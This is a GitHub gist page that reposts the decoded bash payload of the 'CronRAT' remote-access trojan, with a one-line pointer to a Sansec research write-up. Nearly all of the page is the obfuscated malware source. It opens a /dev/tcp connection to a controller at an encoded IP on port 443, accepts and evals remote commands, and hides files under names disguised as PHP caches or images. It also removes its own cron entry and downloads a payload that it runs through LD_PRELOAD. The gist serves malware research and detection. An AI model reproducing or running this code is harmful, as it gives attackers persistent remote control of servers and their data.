Skip to content

Instantly share code, notes, and snippets.

@thebigplate

thebigplate/_cronrat.sh

Forked from gwillem/_cronrat.sh
Created November 29, 2021 00:28
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save thebigplate/c6f92efeac90dad2d5c5db71b7912ffb to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save thebigplate/c6f92efeac90dad2d5c5db71b7912ffb to your computer and use it in GitHub Desktop.
Download ZIP
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
Raw
cronrat.sh
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
fi
}
function O85()
{
echo "F${1}"
O70
exit ${1}
}
function O73()
{
if [[ "$(type ${1} &> /dev/null; echo ${?})" == 0 ]]; then
echo 1
else
echo 0
fi
}
function O63()
{
O27=$(command -v "${1}")
if [[ -u "${O27}" || -g "${O27}" ]]; then
echo 1
else
echo 0
fi
}
if [[ $(O73 "") == 0 ]]; then
O85 8
fi
if [[ $(O63 "") == 1 ]]; then
O85 10
fi
if [[ $(O73 "printf") == 0 || $(O73 "ps") == 0 || $(O73 "od") == 0 || $(O73 "seq") == 0 || $(O73 "dd") == 0 || $(O73 "awk") == 0 ]]; then
O85 6
fi
if [[ $(O73 "crontab") == 0 ]]; then
O85 9
fi
O15=1
O18=2
O12=3
O19=4
O16=5
O13=6
O7=7
O1=10
O10=$(printf '9%.0s' $(seq 1 ${O1}))
O9=3
O36=('/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared' "/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock" "/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM" '/var/tmp;php_cache|www_cache|worker_cahce' "$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css")
O25=0
O17=1
O5=2
function O72()
{
local new_cron=""
local O46=false
while read O39; do
if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then
new_cron+="${O39}\n"
else
O46=true
fi
done <<< "$(crontab -l 2>/dev/null)"
if [[ "${O46}" == false ]]; then
echo -n ${O17}
return
fi
echo -e "${new_cron%??}" | crontab - &>/dev/null
if [[ $? != 0 ]]; then
echo -n ${O5}
return
fi
echo -n ${O25}
}
function O71()
{
echo $(( $(awk '{printf "%0.f", $1}' < /proc/uptime) + 1 ))
}
function O65()
{
local today="$(date +'%F')"
local now=$(date +'%s')
local midnight=$(date -d "${today} 0" +%s)
echo "$((${now} - ${midnight}))"
}
O23=$(( $(O71) / (30 * 60) ))
O3=$(( ($(O65) / 60) % 120 ))
if [[ ${O23} -ne 1 ]]; then
if [[ ${O3} -ne 0 ]]; then
O85 0
fi
fi
function O81()
{
echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n'
}
function O76()
{
echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}'
}
function O84()
{
if [[ $(O73 "/bin/lsof") == 0 && $(O73 "/sbin/lsof") == 0 && $(O73 "/bin/fuser") == 0 && $(O73 "/sbin/fuser") == 0 ]]; then
echo -1
fi
local O41=-1
if [[ $(O73 "/bin/lsof") == 1 ]]; then
O41=$(/bin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/sbin/lsof") == 1 ]]; then
O41=$(/sbin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/bin/fuser") == 1 ]]; then
O41=$(/bin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
elif [[ $(O73 "/sbin/fuser") == 1 ]]; then
O41=$(/sbin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
fi
echo "${O41}" | awk -F' ' '{print $NF}'
}
function O75()
{
"$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&-
}
function O74()
{
set +eE
local O41=-1
for O61 in {1..1024}; do
local _o_="$(true 2>/dev/null >&${O61}; echo $?)"
local _i_="$(true 2>/dev/null <&${O61}; echo $?)"
if [[ "${_o_}${_i_}" == "11" ]]; then
O41=${O61}
break
fi
done
set -eE
echo ${O41}
}
function O68()
{
set +eE
O41=$(grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts; echo $?)
set -eE
echo ${O41}
}
function O69()
{
set +eE
O41=$(df -P "${1}" 2>/dev/null)
if [[ ${?} -eq 0 ]]; then
O41=$(echo "${O41}" | tail -1)
if [[ "${O41}" == /dev/mapper/* ]]; then
O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6)
else
O41=$(echo "${O41}" | cut -d' ' -f1)
fi
else
O41=1
fi
set -eE
echo ${O41}
}
function O64()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[@]}"
}
function O62()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[${3}]}"
}
function O66()
{
local O41=0
local O50="${1}"
if [[ -L "${O50}" ]]; then
if [[ -e "${O50}" ]]; then
O50=$(realpath "${O50}")
else
echo 0
return
fi
fi
O31=$(O69 "${O50}")
if [[ "${O31}" != "1" ]]; then
if [[ "${O31}" == "tmpfs" ]]; then
O31="${O50}"
fi
if [[ $(O68 "${O31}") -eq 1 ]]; then
if [[ -e "${O50}" && -d "${O50}" && -w "${O50}" ]]; then
O41=1
fi
fi
fi
echo ${O41}
}
O56=$(O74)
if [[ ${O56} -eq -1 ]]; then
O85 1;
fi
O55="-1"
O58="-1"
O57="-1"
for O35 in "${O36[@]}"; do
O28=($(O64 ';' "${O35}"))
O50="${O28[0]}"
if [[ $(O66 "${O50}") -eq 1 ]]; then
O26=($(O64 '|' "${O28[1]}"))
O55="${O50}"
O58="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}"
O57="${O55}/${O58}"
break
fi
done
if [[ "${O55}" == "-1" || "${O58}" == "-1" || "${O57}" == "-1" ]]; then
O85 2;
fi
set +eE
eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5
set -eE
eval "head -c "26" <&${O56}" &> /dev/null
function O67()
{
O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null)
if [[ -z ${O60} ]]; then
O60='X';
fi
if [[ ${O60} == $'\n' ]]; then
O60='1';
fi
if [[ ${O60} == $'\'' ]]; then
O60='h';
fi
echo $(( 16#$(O81 "${O60}") ))
}
function O79()
{
local O41=""
for ((i=0; i < ${#1}; i++)); do
O51=$((10#$(printf "%d" "'${1:$i:1}")))
O52=$(printf '%02d ' $((${2} ^ ${O51})) )
O41="${O41}${O52}"
done
O76 "${O41}" | base64 -w0 -
}
function O78()
{
local O41=""
O53=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n')
O32=$(echo "${1}" | base64 -w0 -d - | wc -c)
for ((i=0; i < $(( ${O32} * 2 )); i+=2)); do
O51=$((16#$(printf ${O53:$i:2})))
O52=$(printf \\$(printf '%03o' $((${2} ^ ${O51})) ) )
O41="${O41}${O52}"
done
echo ${O41}
}
function O83()
{
O60=$(O67)
O21=$(O76 "${O60}")
O8=$(O76 "${2}")
O30=$(O79 "${1}" $O60)
O49=${#O30}
if [[ ${O49} -gt ${O10} ]]; then
O85 3;
fi
O44=$(printf "%0${O9}d" ${O54})
O45=$(printf "%0${O1}d" ${O49})
eval "echo -n '${O21}${O8}${O44}${O45}${O30}' >&${O56}"
}
function O80()
{
O20=${1:-false}
O60=$(head -c "1" <&${O56})
O29=$(head -c "1" <&${O56})
O37=$(head -c "${O9}" <&${O56})
O43=$(head -c "${O1}" <&${O56})
O49=$((10#${O43}))
if [[ ${O49} -gt ${O10} ]]; then
O85 4;
fi
O38=$(head -c "${O49}" <&${O56})
O22=$(( 16#$(O81 "${O60}") ))
if [[ ${O20} == true ]]; then
O6="${O38}"
else
O6=$(O78 "${O38}" ${O22})
fi
echo "${O6}"
}
function O82()
{
head -c "${1}" <&${O56} > /dev/null
}
function O77()
{
eval "exec ${O56}>&-"
}
O83 "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" ${O15}
O83 "cio" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
O34=$(O80)
if [[ "${O34}" == "sd" ]]; then
set +eE
O59=$(O72)
set -eE
if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then
O83 "SD${O59}" ${O19}
elif [[ ${O59} -eq ${O25} ]]; then
O83 "SD${O25}" ${O7}
echo "SD"
exit 0
else
O83 "SD${O59}" ${O16}
fi
O83 "cex" ${O18}
O85 0
fi
if [[ "${O34}" == "ev" ]]; then
O48=$(O80)
O59=$(eval "${O48}")
if [[ ! -z "${O59}" ]]; then
O83 "${O59}" ${O13}
fi
O83 "cex" ${O18}
O85 0
fi
if [[ ${O34} -eq 0 ]]; then
O85 0
fi
O83 "prm" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
O11=$(O80)
O2=$(O62 '|' "${O11}" 0)
O0=$(O62 '|' "${O11}" 1)
O33=$(O62 '|' "${O11}" 2)
O40=$(O62 '|' "${O11}" 3)
O42=$(O62 '|' "${O11}" 4)
O47=$(O62 '|' "${O11}" 5)
if [[ "${O57}" != "${O2}" ]]; then
if [[ $(O66 $(dirname "${O2}")) -eq 1 ]]; then
O57="${O2}"
fi
fi
O83 "dwn" ${O18}
O4=$(O80 true)
echo "${O4}" | base64 -w0 -d - > "${O57}"
set +eE
O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}")
set -eE
if [[ ${O24} -ne -1 ]]; then
O14=5
while [[ ${O14} -ne 0 ]]; do
if ps -p ${O24} &> /dev/null; then
true
else
O83 "ser" ${O19}
O85 7
fi
sleep 1
O14=$((${O14} - 1))
done
O83 "ssc" ${O7}
else
O83 "sun" ${O16}
fi
O83 "cex" ${O18}
O77
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment